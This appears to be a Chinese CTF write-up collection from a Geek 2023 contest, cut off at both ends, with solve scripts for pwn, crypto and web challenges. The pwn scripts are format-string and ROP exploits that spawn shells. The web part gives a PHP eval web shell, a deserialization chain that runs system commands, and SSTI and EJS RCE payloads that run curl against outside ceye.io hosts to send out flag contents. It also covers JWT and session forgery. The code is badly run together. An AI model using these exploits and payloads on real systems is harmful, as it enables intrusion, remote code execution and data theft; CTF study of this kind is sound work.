watch\n")pay=p64(0x404080+0x40)+p64(0x401305)s(pay)libc_base=get_addr()-libc.sym['_IO_2_1_stderr_']li(hex(libc_base))one_gadget=libc_base+0xe3b01write=libc_base+libc.sym['_IO_2_1_stdout_']sl(str(write&0xffffffff))rl("I'll punish you to go back and watch\n")pay=p64(0x404030+0x40+0x10)+p64(one_gadget)s(pay)rl("Do you know <Neon Genesis Evangelion>\n")sl(str(0))rl("I'll punish you to go back and watch\n")pay=p64(0x404018+0x50)+p64(0x401355)s(pay)pause()pay=p64(one_gadget)s(pay)rl("Do you know <Neon Genesis Evangelion>\n")sl(str(0))#libc_base=get_addr()-2017664#li(hex(libc_base))#one_gadget=libc_base+0xe3afe#sl(str(0))#rl("I'll punish you to go back and watch\n")#pay=p64(0)+p64(one_gadget)#s(pay)inter()
fmt2.0
读入的字节少,手动构造payload,把返回地址修改成one_gadget即可
from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./fmt2.0')p = remote('pwn.node.game.sycsec.com', 30045)elf = ELF('./fmt2.0')libc=ELF("./libc.so.6")#libc = ELF('./libc-2.31.so')rl("frist str:")pay=b'%19$p%16$p'#bug()sl(pay)libc_base=int(p.recv(14),16)-libc.sym['__libc_start_main']-243li(hex(libc_base))one_gadget=libc_base+0xe3b01stack=int(p.recv(14),16)-232li(hex(stack))rl("second str:")pay=(b'%'+str((one_gadget>>16)&0xff).encode()+b'c%10$hhn'+b'%'+str((((one_gadget)&0xffff)-((one_gadget>>16)&0xff))).encode()+b'c%11$hn').ljust(32,b'\x00')+p64(stack+2)+p64(stack)print(len(pay))s(pay)li(hex(one_gadget))li(hex((one_gadget>>16)&0xff))li(hex(((one_gadget)&0xffff)-((one_gadget>>16)&0xff)))inter()
fmt3.0
脚本如下:
from pwn import *import sysremote_addr = ["pwn.node.game.sycsec.com",port]libc = ELF('./libc.so.6')#elf = ELF('')if len(sys.argv) == 1:context.log_level="debug"#p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])#p = process(["qemu-aarch64", "-L", ".", "./stack"])p = process("./fmt3.0_patched")context(arch='amd64', os='linux')context.terminal = ['tmux', 'splitw', '-h']if len(sys.argv) == 2 :if 'r' in sys.argv[1]:p = remote(remote_addr[0],remote_addr[1])if 'n' not in sys.argv[1]:context.log_level="debug"context(arch = 'amd64', os = 'linux')r = lambda : p.recv()rl = lambda : p.recvline()rc = lambda x: p.recv(x)ru = lambda x: p.recvuntil(x)rud = lambda x: p.recvuntil(x, drop=True)s = lambda x: p.send(x)sl = lambda x: p.sendline(x)sa = lambda x, y: p.sendafter(x, y)sla = lambda x, y: p.sendlineafter(x, y)shell = lambda : p.interactive()pr = lambda name,x : log.info(name+':'+hex(x))DEBUG = 1def debug(bp = None):if DEBUG == 1:if bp != None:gdb.attach(p, bp)else:gdb.attach(p)#debug()payload = b'%8$p.%13$p'sa(b'me!', payload)ru(b'0x')stack_addr = int(rc(12), 16)pr('stack_addr', stack_addr)ru(b'0x')libc.address = int(rc(12), 16) - libc.sym['__libc_start_main'] - 243binsh = next(libc.search(b'/bin/sh\x00'))pop_rdi = libc.address + 0x23b6aret = libc.address + 0xc16absystem = libc.sym['system']pr('libc.address', libc.address)ret_addr = (stack_addr + 8) & 0xffpayload = b'%' + str(ret_addr).encode() + b'c%8$hhn'sa(b'me!', payload)payload = b'%' + str(0x74).encode() + b'c%10$hhn'sa(b'me!', payload)payload = flat(ret, pop_rdi, binsh, system)pause()s(payload)shell()
CRYPTO
ext^7gcd
用前两数gcd,使后面的a[i]p[i]和为0
exp:
from Crypto.Util.number import *
from string import *
from hashlib import *
from string import *
from gmpy2 import *
from pwn import *dic = ascii_letters + string.digits
io = remote('59.110.20.54', 1789)io.recvuntil(b'XXXX+')
t = io.recvuntil(b')').decode().strip()[:-1]io.recvuntil(b'== ')
c_sha256 = io.recvline().decode().strip()for i in dic:for j in dic:for k in dic:for x in dic:cipher = i + j + k + x + tz = sha256(cipher.encode()).hexdigest()if z == c_sha256:res = i + j + k + xio.sendline(res)
while True:try:io.recvuntil('[')p = io.recvuntil(b']').decode().strip()[:-1]p = list(map(int, p.split(',')))a = [0] * 7_, a[0], a[1] = gcdext(p[0], p[1])for i in range(2,len(p)):a[i] += p[0]a[0] -= p[i]ans = ''for i in a:ans = ans + str(i) +','ans = ans[:-1]io.sendline(ans)except:k = io.recv()print(k)breakio.interactive()
EzComplex
复数域分解p2+q2
exp:
from Crypto.Util.number import *
from gmpy2 import *N = 973990451943921675425625260267293227445098713194663380695161260771362036776671793195525239267004528550439258233703798932349677698127549891815995206853756301593324349871567926792912475619794804691721625860861059975526781239293017498
c = 122977267154486898127643454001467185956864368276013342450998567212966113302012584153291519651365278888605594000436279106907163024162771486315220072170917153855370362692990814276908399943293854077912175867886513964032241638851526276
e = 0x10001
f = ZZ[i](N)for i in divisors(f):if (i[0] ** 2 + i[1] ** 2 == N):p = abs(int(i[0]))q = abs(int(i[1]))if isPrime(p):n = p * qphi = (p - 1) * (q - 1)d = invert(e, phi)m = powmod(c, d, n)print(long_to_bytes(m))
card_game
lcg
exp:
from pwn import *
from Crypto.Util.number import *
from gmpy2 import *io = remote("59.110.20.54", 4953)
io.recv()
io.sendline(str(1).encode())card_num = ['_A', '_2', '_3', '_4', '_5', '_6', '_7', '_8', '_9', '_10', '_J', '_Q', '_K']x = []
for _ in range(2):io.recvuntil(b'gift: ')t = io.recvuntil(b']').decode().strip()t = t[1:len(t) - 1]gift = t.split(', ')for i in gift:temp = int(i)x.append(temp)x6 = int(gift[2])
print(x)t = []for i in range(1, len(x)):t.append(x[i] - x[i-1])m = 0
for i in range(1, len(t)-1):m = GCD(t[i+1]*t[i-1] - t[i]*t[i], m)print(m)
assert isPrime(m)
a = (x[2] - x[1]) * inverse(x[1] - x[0], m)
b = (x[1] - a*x[0]) % mdef choose_card(num):x = (num>>5)%4if x == 0:return ((num>>6)%13), 'Heart'if x%4 == 1:return ((num>>6)%13), 'Spade'if x%4 == 2:return ((num>>6)%13), 'Diamond'else:return ((num>>6)%13), 'Club'out = x6
print(out)
while True:try:res = []answer = []for j in range(3):out = (out * a + b) % mres.append(out)for j in res:card, suit = choose_card(j)ans = suit + card_num[card] answer.append(ans)ans = (' '.join(answer)).encode()sleep(0.1)io.sendline(ans)except:x = io.recv()if b'SYC' in x:print(x)breakio.interactive()
Energetic_Carcano
类似lcg的操作
exp:
from Crypto.Util.number import *
from gmpy2 import *pts = []
f = []
for x in range(len(pts)):f.append(pts[x, 1] ** 2 - pts[0, 1] ** 2 - (pts[x, 0] ** 3 - pts[0, 0] ** 3))p1 = f[3] * (pts[2, 0] - pts[0, 0]) - f[2] * (pts[3, 0] - pts[0, 0])
p2 = f[1] * (pts[2, 0] - pts[0, 0]) - f[2] * (pts[1, 0] - pts[0, 0])
p = gcd(p2, p1)
print(p)
assert isPrime(p)inv = invert(pts[1, 0] - pts[0, 0], p)
a = (f[1] * inv) % p
print(a)b = (pts[1, 1] ** 2 - pts[1, 0] ** 3 - a * pts[1, 0]) % p
print(b)
JPGDiff
Hilbert曲线,上网找个脚本改改
from PIL import Imageimages = []
raw = Image.open("./geek_chanllenge/ct.png")
for i in range(0,65536):region = raw.crop((0,i,1,i+1))images.append(region)new_image = Image.new("RGB", (256,256), "white")cd=['w']
for ttt in range(0,8):tcd=[]for i in cd:if(i=='w'):tcd.append('d')tcd.append('w')tcd.append('w')tcd.append('a')if(i=='d'):tcd.append('w')tcd.append('d')tcd.append('d')tcd.append('s')if(i=='s'):tcd.append('a')tcd.append('s')tcd.append('s')tcd.append('d')if(i=='a'):tcd.append('s')tcd.append('a')tcd.append('a')tcd.append('w')cd=tcd[:]print(cd,len(cd))
x=256
y=0for i in range(0,65536):new_image.paste(images[i],(x,y))if(cd[i]=='w'):x-=1if(cd[i]=='d'):y+=1if(cd[i]=='s'):x+=1if(cd[i]=='a'):y-=1
new_image.save("./geek_chanllenge/out.png")
Simple3DES
弱密钥
key=b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE"+b"\x01\x01\x01\x01\x01\x01\x01\x01"+b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE"
加密两次等于没加密
exp:
from Crypto.Util.number import *key = b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE"+b"\x01\x01\x01\x01\x01\x01\x01\x01"+b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE"
print(bytes_to_long(key))
print(long_to_bytes(37699681561444816228091816433931698303804192466855953954712547876593130083457))
Fi1nd_th3_x'
from sage.arith.all import crtdef extended_crt(congruences):remainders = [congruence[0] for congruence in congruences]moduli = [congruence[1] for congruence in congruences]solution = crt(remainders, moduli)return solutionp= 13014610351521460822156239705430709078128228907778181478242620569429327799535062679140131416771915929573454741755415612880788196172134695027201422226050343
q= 12772373441651008681294250861077909144300908972709561019514945881228862913558543752401850710742410181542277593157992764354184262443612041344749961361188667
r= 12128188838358065666687296689425460086282352520167544115899775800918383085863282204525519245937988837403739683061218279585168168892037039644924073220678419
dP= 116715737414908163105708802733763596338775040866822719131764691930369001776551671725363881836568414327815420649861207859100479999650414099346914809923964116101517432576562641857767638396325944526867458624878906968552835814078216316470330511385701105459053294771612727181278955929391807414985165924450505855941
dQ= 44209639124029393930247375993629669338749966042856653556428540234515804939791650065905841618344611216577807325504984178760405516121845853248373571704473449826683120387747977520655432396578361308033763778324817416507993263234206797363191089863381905902638111246229641698709383653501799974217118168526572365797
dR= 60735172709413093730902464873458655487237612458970735840670987186877666190533417038325630420791294593669609785154204677845781980482700493870590706892523016041087206844082222225206703139282240453277802870868459288354322845410191061009582969848870045522383447751431300627611762289800656277924903605593069856921
c= 93063188325241977486352111369210103514669725591157371105152980481620575818945846725056329712195176948376321676112726029400835578531311113991944495646259750817465291340479809938094295621728828133981781064352306623727112813796314947081857025012662546178066873083689559924412320123824601550896063037191589471066773464829226873338699012924080583389032903142107586722373131642720522453842444615499672193051587154108368643495983197891525747653618742702589711752256009congruences = [(dP,(q-1)*(r-1)), (dQ,(p-1)*(r-1)), (dR,(p-1)*(q-1))]result = extended_crt(congruences)
print("Solution:", result)d = 165491523462007956398530261238759923870196080375265000534525661690633345463015242789311873568146385720020040624656002271057930225387764840769974562070646182847943707538823108901869155436725226837904509058886854986841295642060081156709176798958145207599953407769840343425663149902266682646724106747828667725830936024035707038099651237637163657086990976684361419102226209657433291392884336805246968126787159394313213089671545441606442264218646417418814509400366113c= 93063188325241977486352111369210103514669725591157371105152980481620575818945846725056329712195176948376321676112726029400835578531311113991944495646259750817465291340479809938094295621728828133981781064352306623727112813796314947081857025012662546178066873083689559924412320123824601550896063037191589471066773464829226873338699012924080583389032903142107586722373131642720522453842444615499672193051587154108368643495983197891525747653618742702589711752256009
flag=pow(c,d,p*q*r)
from libnum import *
print(n2s(int(flag)))
#SYC{CRT_1s_f3n_but_Gen3hi_im9act_is_a_balabalaba}
Diligent_Liszt
p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421
q = 1711302770747802020613711652777299980542669713888988077474955896217408515180094849053961025086865697904731088087532944829046702427480842253022459937172565651
r = 132969813572228739353704467775972551435751558645548804253458782569132362201099158857093676816706297676454547299888531536236748314013888413096371966359860637
y = 5385116324746699759660077007129548063211490907227715474654765255668507958312745677683558789874078477569613259930365612562164095274660123330458355653249805062678976259429733060364358954180439218947514191603330532117142653558803034110759332447742304749985874760435453594107494324797235909651178472904825071375135846093354526936559640383917210702874692725723836865724807664892994298377375580807917514349966834376413176898806591411038129330967050554114677719107335006266
e=3c1 = GF(p)(y)
c2 = GF(q)(y)
c3= GF(r)(y)
e1 = GF(p)(e)
e2 = GF(q)(e)
e3 = GF(r)(e)
k1 = discrete_log(c1, e1)
k2 = discrete_log(c2, e2)
k3 = discrete_log(c3, e3)
m = crt([k1, k2,k3], [p - 1, q - 1,r-1])
print(bytes.fromhex(hex(m)[2:]))
#SYC{D1scr3te_L0g_W1th_Mult1pl3_pr1m35}
Signin
16进制ascii码转换为字符,得到flag
proof_of_work
import hashlibimport reimport stringfrom itertools import product as iterate_productdef perform_security_check():security_info = 'sha256(XXXX+FCxk8M9svYwVMfGe) == 793edc396da13a7992b429e50e7d122c41debbd902419d26a0792b4008dba844'character_set = string.ascii_letters + string.digitssecret_suffix = re.search(r'\(XXXX\+(.*?)\)', security_info).group(1)target_hash = re.search(r'== (.*?)$', security_info).group(1)print(f"Secret Suffix: {secret_suffix}, Target Hash: {target_hash}")for attempt in iterate_product(character_set, repeat=4):prefix_attempt = ''.join(attempt)guess_attempt = f"{prefix_attempt}{secret_suffix}"if hashlib.sha256(guess_attempt.encode()).hexdigest() == target_hash:print(f"Success! Found XXXX Prefix: {prefix_attempt}")return prefix_attemptreturn Noneperform_security_check()
SimpleRSA
OTPTwice
from pwn import xor
M1=b'\xdbi\xab\x8d\xfb0\xd3\xfe!\xf8Xpy\x80w\x8c\x87\xb9'
M2=b'o\xb0%\xfb\xdb\x0e\r\x04\xde\xd1\x9a\x08w\xda4\x0f\x0cR'
M3=b'\xe7\x80\xcd\ria\xb2\xca\x89\x1a\x9d;|#3\xf7\xbb\x96'n1=xor(M2,M3)
n2=xor(M2,M1)flag=xor(n1,M1)
print(flag)
OldAlgorithm
from Crypto.Util.number import *c_values = [36086, 4005, 3350, 23179, 34246, 5145, 32490, 16348, 13001, 13628, 7742, 46317, 50824, 23718, 32995, 7640, 10590, 46897, 39245, 16633, 31488, 36547, 42136, 52782, 31929, 34747, 29026, 18748, 6634, 9700, 8126, 5197]
p_values = [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333]def solve_modulo_equations(c_values, p_values):n = len(c_values)M = 1M_values = []for p in p_values:M *= pfor p in p_values:M_values.append(M // p)y_values = [inverse(M_values[i], p_values[i]) for i in range(n)]x = 0for i in range(n):x += c_values[i] * M_values[i] * y_values[i]x %= Mreturn long_to_bytes(x)flag = solve_modulo_equations(c_values, p_values)
print("Decrypted Flag:", flag)
easy_classic
凯撒,栅栏,base64,熊曰,emoji,playfair
PolyRSA
csdn找到相关解法
from Crypto.Util.number import *
from gmpy2 import * e1 = 113717
e2 = 80737
c1 = 97528398828294138945371018405777243725957112272614466238005409057342884425132214761228537249844134865481148636534134025535106624840957740753950100180978607132333109806554009969378392835952544552269685553539656827070349532458156758965322477969141073720173165958341043159560928836304172136610929023123638981560836183245954461041167802574206323129671965436040047358250847178930436773249800969192016749684095882580749559014647942135761757750292281205876241566597813517452803933496218995755905344070203047797893640399372627351254542342772576533524820435965479881620338366838326652599102311019884528903481310690767832417584600334987458835108576322111553947045733143836419313427495888019352323209000292825566986863770366023326755116931788018138432898323148059980463407567431417724940484236335082696026821105627826117901730695680967455710434307270501190258033004471156993017301443803372029004817834317756597444195146024630164820841200575179112295902020141040090350486764038633257871003899386340004440642516190842086462237559715130631205046041819931656962904630367121414263911179041905140516402771368603623318492074423223885367923228718341206283572152570049573607906130786276734660847733952210105659707746969830132429975090175091281363770357
c2 = 353128571201645377052005694809874806643786163076931670184196149901625274899734977100920488129375537186771931435883114557320913415191396857882995726660784707377672210953334914418470453787964899846194872721616628198368241044602144880543115393715025896206210152190007408112767478800650578941849344868081146624444817544806046188600685873402369145450593575618922226415069043442295774369567389939040265656574664538667552522329712111984168798829635080641332045614585247317991581514218486004191829362787750803153463482021229058714990823658655863245025037102127138472397462755776598314247771125981017814912049441827643898478473451005083533693951329544115861795587564408860828213753948427321483082041546722974666875065831843384005041800692983406353922680299538080900818930589336142421748023025830846906503542594380663429947801329079870530727382679634952272644949425079242992486832995962516376820051495641486546631849426876810933393153871774796182078367277299340503872124124714036499367887886486264658590613431293656417255355575602576047502506125375605713228912611320198066713358654181533335650785578352716562937038768171269136647529849805172492594142026261051266577821582011917001752590659862613307646536049830151262848916867223615064832279222
cipher = 375617816311787295279632219241669262704366237192565344884527300748210925539528834207344757670998995567820735715933908541800125317082581328287816628816752542104514363629022246620070560324071543077301256917337165566677142545053272381990573611757629429857842709092285442319141751484248315990593292618113678910350875156232952525787082482638460259354559904243062546518553607882194808191571131590524874275187750985821420412987586148770397073003186510357920710387377990379862185266175190503647626248057084923516190642292152259727446111686043531725993433395002330208067534104745851308178560234372373476331387737629284961288204368572750848248186692623500372605736825205759172773503283282321274793846281079650686871355211691681512637459986684769598186821524093789286661348936784712071312135814683041839882338235290487868969391040389837253093468883093296547473466050960563347060307256735803099039921213839491129726807647623542881247210251994139130146519265086673883077644185971830004165931626986486648581644383717994174627681147696341976767364316172091139507445131410662391699728189797082878876950386933926807186382619331901457205957462337191923354433435013338037399565519987793880572723211669459895193009710035003369626116024630678400746946356
n = 728002565949733279371529990942440022467681592757835980552797682116929657292509059813629423038094227544032071413317330087468458736175902373398210691802243764786251764982802000867437756347830992118278032311046807282193498960587170291978547754942295932606784354258945168927044376692224049202979158068158842475322825884209352566494900083765571037783472505580851500043517614314755340168507097558967372661966013776090657685241689631615245294004694287660685274079979318342939473469143729494106686592347327776078649315612768988028622890242005700892937828732613800620455225438339852445425046832904615827786856105112781009995862999853122308496903885748394541643702103368974605177097553007573113536089894913967154637055293769061726082740854619536748297829779639633209710676774371525146758917646731487495135734759201537358734170552231657257498090553682791418003138924472103077035355223367678622115314235119493397080290540006942708439607767313672671274857069053688258983103863067394473084183472609906612056828326916114024662795812611685559034285371151973580240723680736227737324052391721149957542711415812665358477474058103338801398214688403784213100455466705770532894531602252798634923125974783427678469124261634518543957766622712661056594132089
e = 65537 ee = e1 * e2
a = powmod(2, ee, n)
b = powmod(3, ee, n)
c = powmod(5, ee, n)
d = powmod(7, ee, n) t = a * d - b * c
kp = invert(t, n) * (d * powmod(c1, e2, n) - b * powmod(c2, e1, n)) % n p = gcd(kp, n)
q = n // p phi = (p - 1) * (q - 1)
m = powmod(cipher, invert(e, phi), n)
print(long_to_bytes(m))
Just need one
选择-2**32.
每次取走32位,转成十进制,再保证值n总会回到正数所以n*-1.
import socket
import json
import os
import random
import string
import hashlib def getHashAnswer(p,q): alphabet=''.join([chr(i+ord('a')) for i in range(0,26)]+[chr(i+ord('A')) for i in range(0,26)]+[chr(i+ord('0')) for i in range(0,10)]) for a in alphabet: for b in alphabet: for c in alphabet: for d in alphabet: t=hashlib.sha256((a+b+c+d+p).encode()).hexdigest() if(t==q): return a+b+c+d target_ip = "59.110.20.54"
target_port =2613 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port)) response = sock.recv(2048).decode()
print(f"Response:\n{response}\n")
ans1 = getHashAnswer(response.split('+')[1].split(")")[0],response.split("=")[-1].split()[0])
print(ans1)
sock.sendall(ans1.encode("utf-8"))
sock.send(b'\n') response = sock.recv(2048).decode()
print(f"Response:\n{response}\n")
sock.sendall(str(-pow(2,32)).encode("utf-8"))
sock.send(b'\n') response = sock.recv(2048).decode()
print(f"Response:\n{response}\n")
num=int(response[:-25])
b=[] for j in range(0,128): num=num+pow(2,32*128) b.append(int(bin(num)[-32:],2)) num//=pow(2,32) num*=-1 sock.sendall(str(b)[1:-1].encode("utf-8"))
sock.send(b'\n')
response = sock.recv(2048).decode()
print(response)
WEB
unsign
exp如下
<?phphighlight_file(__FILE__);class syc{public $cuit;public function __destruct(){echo("action!<br>");$function=$this->cuit;return $function();}}class lover{public $yxx;public $QW;public function __invoke(){echo("invoke!<br>");return $this->yxx->QW;}}class web{public $eva1;public $interesting;public function __get($var){echo("get!<br>");$eva1=$this->eva1;$eva1($this->interesting);}}$a = new syc();$a->cuit = new lover();$a->cuit->yxx = new web();$a->cuit->yxx->eva1 = 'system';$a->cuit->yxx->interesting = 'cat /flag';echo serialize($a);?>
EzHttp
查看源码访问robots.txt,账号密码在/o2takuXX's_username_and_password.txt文件里post传参
username=admin&password=@dm1N123456r00t#
Referer: sycsec.com
User-Agent: Syclover
X-Forwarder-For: 127.0.0.1
n00b_Upload
文件上传
文件名:shell.php 文件内容: GIF89a <?= eval($_POST[1]);?>
easy_php
GET传参: syc=Welcome+to+GEEK+2023!%0a&lover=2022e1 POST传参: qw[]=&yxx[]=&SYC[GEEK.2023=Happy to see you!
ctf_curl
-T /tmp/Syclover y91yp4.ceye.io //带出指定文件的内容
flag保卫战
源码获取账号密码登录后先伪造JWT,密码为默认的123456,然后条件竞争获取flag
import requestsimport threadingheaders = {'Cookie':'jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAwOTMwNjI0fQ.v8TR1br3L9cW4h1pfgGh2gQXurO9vryyJpfVRxlclIY'}url = 'https://lqbalz8ywlacp9ynx4e7vt8jr.node.game.sycsec.com/'uploadurl = url + 'upload'csrfurl = url + 'new-csrf-token'flagurl = url + 'flag?pass=1111'listurl = url + 'file-list'def upload():while True:r = requests.get(url=csrfurl,headers=headers)content_length = r.headers.get('Set-Cookie')csrf_token1 = content_length.split('yak_csrf=')[-1].split(';')[0]file = {'filename':('1.txt','1','text/plain')}data = {'yak-token':r.text}headers2 = {'Cookie': 'jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAwOTMwNjI0fQ.v8TR1br3L9cW4h1pfgGh2gQXurO9vryyJpfVRxlclIY; yak_csrf='+csrf_token1}r2 = requests.post(url=uploadurl,headers=headers2,files=file,data=data)print(r2.text)def flag():while True:r = requests.get(url=csrfurl, headers=headers)content_length = r.headers.get('Set-Cookie')csrf_token1 = content_length.split('yak_csrf=')[-1].split(';')[0]data = {'yak-token': r.text}headers2 = {'Cookie': 'jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAwOTMwNjI0fQ.v8TR1br3L9cW4h1pfgGh2gQXurO9vryyJpfVRxlclIY; yak_csrf=' + csrf_token1}# r2 = requests.get(url=listurl,headers=headers2,data=data)# print(r2.text)r3 = requests.get(url=flagurl,data=data,headers=headers2)print(r3.text)threads = [threading.Thread(target=upload), threading.Thread(target=flag)]for t in threads:t.start()
klf_ssti
无回显ssti,hackbar随便一个payload直接打
url/hack?klf={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('curl http://y91yp4.ceye.io/`cat /app/fl4gfl4gfl4g | base64`').read()}}{%endif%}{%endfor%}
ez_remove
O:3:"syc":2:{S:5:"love\72";s:23:"assert($_POST["chu0"]);";}
//这里的assert必须要加,不然会连不上
改为http信道,使用base64编码进行连接
ez_path
算pin后直接命令执行
记得用print
print(__import__('os').popen('ls').read())
you konw flask?
session伪造,key随便写个脚本爆一下
app.secret_key = 'wanbao'+base64.b64encode(str(random.randint(1, 100)).encode('utf-8')).decode('utf-8')+'wanbao'
脚本如下
import itertoolsimport flask_unsignfrom flask_unsign.helpers import wordlistimport requests as rimport timeimport reimport sysimport base64path = "wordlist.txt"print("Generating wordlist... ")with open(path,"w") as f:#permutations with repetition[f.write('wanbao'+base64.b64encode(str(i).encode('utf-8')).decode('utf-8')+'wanbao'+'\n') for i in range(1,100)]url = "http://47.115.201.35:8000/index"#cookie_tamper = r.head(url).cookies.get_dict()['session']cookie_tamper='eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiIxMjMiLCJ1c2VyX2lkIjoyfQ.ZUdERQ.G9_GQ_94b-KfDOtnxWXVWWZOV94'print("Got cookie: " + cookie_tamper)print("Cracker Started...")obj = flask_unsign.Cracker(value=cookie_tamper)before = time.time()with wordlist(path, parse_lines=False) as iterator:obj.crack(iterator)secret = ""if obj.secret:secret = obj.secret.decode()print(f"Found SECRET_KET {secret} in {time.time()-before} seconds")
session伪造拿下flag
Pupyy_rce
赌狗代码,随机读文件
print_r(highlight_file(array_rand(array_flip(scandir(current(localeconv()))))));
famale_imp_l0ve
phar协议读取压缩流
雨
源码如下
const express = require('express');const jwt = require('jsonwebtoken');const app = express();const bodyParser = require('body-parser')const path = require('path');const jwt_secret = "VanZY";const cookieParser = require('cookie-parser');const putil_merge = require("putil-merge")app.set('views', './views');app.set('view engine', 'ejs');app.use(cookieParser());app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())var Super = {};var safecode = function (code){let validInput = /global|mainModule|import|constructor|read|write|_load|exec|spawnSync|stdout|eval|stdout|Function|setInterval|setTimeout|var|\+|\*/ig;return !validInput.test(code);};app.all('/code', (req, res) => {res.type('html');if (req.method == "POST" && req.body) {putil_merge({}, req.body, {deep:true});}res.send("welcome to code");});app.all('/hint', (req, res) => {res.type('html');res.send("I heard that the challenge maker likes to use his own id as secret_key");});app.get('/source', (req, res) => {res.type('html');var auth = req.cookies.auth;jwt.verify(auth, jwt_secret , function(err, decoded) {try{if(decoded.user==='admin'){res.sendFile(path.join(__dirname + '/index.js'));}else{res.send('you are not admin <!--Maybe you can view /hint-->');}}catch{res.send("Fuck you Hacker!!!")}});});app.all('/create', (req, res) => {res.type('html');if (!req.body.name || req.body.name === undefined || req.body.name === null){res.send("please input name");}else {if (Super['userrole'] === 'Superadmin') {res.render('index', req.body);}else {if (!safecode(req.body.name)) {res.send("你在做什么?快停下!!!")}else{res.render('index', {name: req.body.name});}}}});app.get('/',(req, res) => {res.type('html');var token = jwt.sign({'user':'guest'},jwt_secret,{ algorithm: 'HS256' });res.cookie('auth ',token);res.end('Only admin can get source in /source');});app.listen(3000, () => console.log('Server started on port 3000'));
jwt伪造
密钥为VanZY (看源码有hint)
原型链污染
/code
{"constructor":{"prototype":{"userrole":"Superadmin"}}}
ejs rce
参考博客:
ejs RCE CVE-2022-29078 bypass - inhann的博客 | inhann's Blog
{"settings":{"view options":{"escapeFunction":"console.log;this.global.process.mainModule.require('child_process').execSync('curl http://6huhzb.ceye.io');","client":"true"}},"name":"exec"}
反弹shell拿下
ez_php
php原生类的总结_php 原生类_Z3eyOnd的博客-CSDN博客
源码和链子如下
<?phpheader("Content-type:text/html;charset=utf-8");error_reporting(0);show_source(__FILE__);include('key.php');include('waf.php');class Me {public $qwe;public $bro;public $secret;public function __wakeup() {echo("进来啦<br>");$characters = 'abcdefghijklmnopqrstuvwxyz0123456789';$randomString = substr(str_shuffle($characters), 0, 6);$this->secret=$randomString;if($this->bro===$this->secret){echo "234";$bb = $this->qwe;return $bb();}else{echo("错了哥们,再试试吧<br>");}}}class her{public $asd;private $hername='momo';private $key='9';public function __invoke() {echo("好累,好想睡一觉啊<br>");serialize($this->asd);}public function find() {echo("你能找到加密用的key和她的名字吗?qwq<br>");if (encode($this->hername,$this->key) === 'vxvx') {echo("解密成功!<br>");$file=$_GET['file'];if (isset($file) && (file_get_contents($file,'r') === "loveyou")){echo("快点的,急急急!!!<br>");echo new $_POST['ctf']($_GET['fun']);}else{echo("真的只差一步了!<br>");}}else{echo("兄弟怎么搞的?<br>");}}}class important{public $power;public function __sleep() {echo("睡饱了,接着找!<br>");return $this->power->seeyou;}}class useless {private $seeyou;public $QW;public $YXX;public function __construct($seeyou) {$this->seeyou = $seeyou;}public function __destruct() {$characters = '0123456789';$random = substr(str_shuffle($characters), 0, 6);if (!preg_match('/key\.php\/*$/i', $_SERVER['REQUEST_URI'])){if((strlen($this->QW))<80 && strlen($this->YXX)<80){$bool=!is_array($this->QW)&&!is_array($this->YXX)&&(md5($this->QW) === md5($this->YXX)) && ($this->QW != $this->YXX) and $random==='newbee';if($bool){echo("快拿到我的小秘密了<br>");$a = isset($_GET['a'])? $_GET['a']: "" ;if(!preg_match('/HTTP/i', $a)){echo (basename($_SERVER[$a]));echo ('<br>');if(basename($_SERVER[$a])==='key.php'){echo("找到了!但好像不能直接使用,怎么办,我好想她<br>");$file = "key.php";readfile($file);}}else{echo("你别这样,她会生气的┭┮﹏┭┮");}}}else{echo("就这点能耐?怎么帮我找到她(╥╯^╰╥)<br>");}}}public function __get($good) {echo "you are good,你快找到我爱的那个她了<br>";$zhui = $this->$good;$zhui[$good]();}}$a = new Me();$a->bro = &$a->secret;$a->qwe = new her();$a->qwe->asd = new important();$args2 = array(new her,'find');$args = array('seeyou'=>$args2);$a->qwe->asd->power = new useless($args);//$c='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2';//$a->qwe->asd->power->YXX = urldecode($c);//$d = 